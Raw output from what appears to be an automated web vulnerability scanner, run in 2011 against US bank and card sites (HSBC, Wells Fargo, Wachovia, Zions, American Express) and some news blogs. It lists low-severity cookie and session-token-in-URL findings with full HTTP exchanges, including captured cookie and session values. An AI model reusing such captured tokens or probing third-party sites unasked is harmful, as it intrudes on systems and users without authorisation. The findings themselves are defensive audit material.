SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/2/3/personal/online-services/personal-internet-banking/log-on HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:09 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:09 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000RrQWzP_uaKImrSDJuRHMmav:14k1jbteq; Path=/ Set-Cookie: CAMToken=8yJSFvsmfjijg6MsjugN571fSOU=; Path=/1; Secure Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:09:09 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 27426
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wachovia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Wachovia - Person ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:19:51 GMT Content-type: text/html;charset=UTF-8 Cache-control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-cookie: JSESSIONID=BC8AFB9D09E6CFB6400171C92F8B73FF;Path=/;Secure Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Thu, 03 Feb 2011 13:21:18 GMT Content-type: text/html;charset=UTF-8 Cache-control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/EFS/WAC1 HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/insurance/identity HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:13 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:13 GMT; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/apply/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:06 GMT
Content-length: 9767
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:06 GMT; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/buy/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:20:48 GMT
Content-length: 11844
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:20:48 GMT; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - Ho ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/locations/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:15 GMT
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://www.wfhm.com/locations/index.jsp?dm=DMIWEWAC02
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:15 GMT; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wfhm.com/locations/ind ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/rates/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:00 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:00 GMT; path=/
Content-Language: en
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Home Mortgage - To ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgage/refinance/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/mortgage/index?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ichecking_landing.jsp HTTP/1.1
Host: www.zionsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 15:55:18 GMT
Content-type: text/html;charset=ISO-8859-1
Connection: close
Set-Cookie: lid=32f0cfc6e213a410d7efcde3f83e508b;path=/;domain=.zionsbank.com;
Set-Cookie: plid=6ee7930a72c58f63c025e4f8bc6c26a4;expires=Fri, 03-Feb-2012 15:55:18 GMT;path=/;domain=.zionsbank.com;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1
Host: www134.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1
Host: www152.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /merchant/mainpagedom/authreg_showMainpage.do HTTP/1.1
Host: www209.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:08:20 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Location: https://www209.americanexpress.com/merchant/mainpagedom/jumppage.jsp?TYPE=33554432&REALMOID=06-36577fc6-fad0-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$igR5UgqAztly2benjPhgw8%2bn1VWKCX1bCZfPwEgJ%2fJkIgErkX7L%2bPcd4oYgdRXKQ&TARGET=$SM$https%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo
Content-Length: 655
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww309-443=369887754.47873.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www209.americanexpress.com/merchant/mai ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked, or emailed around by users, and they may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL therefore increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
function _f1296730383991(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.ImageryMetadata.PublicTypes.BirdsEyeSearchResponse","Scene":{"S":35778879,"O":0,"Q":"03201010322","RI":36815,"L":2 ...[SNIP]...
function _f1296730153542(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.Geocoding.GeocodingResponse","Results":[{"Name":"19101, PA","Type":132,"BestLocation":{"Precision":1,"Coordinates" ...[SNIP]...
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:32 +0000
Cache-Control: max-age=108, must-revalidate
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 128370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... </div>
GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:43 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:54 +0000
Cache-Control: max-age=245, must-revalidate
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 84762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/oceanfront-with-killer-views-a-deal/14224/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14224>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:57 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64220
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/03/laguna-beach-home-sales-up-13-over-year/14020/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:05:33 +0000
Cache-Control: max-age=279, must-revalidate
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Link: <http://lagunahomes.ocregister.com/?p=14020>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 53064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/a-new-home-for-kobe-bryant/97596/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:02:32 +0000
Cache-Control: max-age=91, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=97596>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 115709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </div>
GET /2011/02/02/homebuilding-slump-now-3-years-old/98070/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:27 +0000
Cache-Control: max-age=206, must-revalidate
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Link: <http://lansner.ocregister.com/?p=98070>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 101944
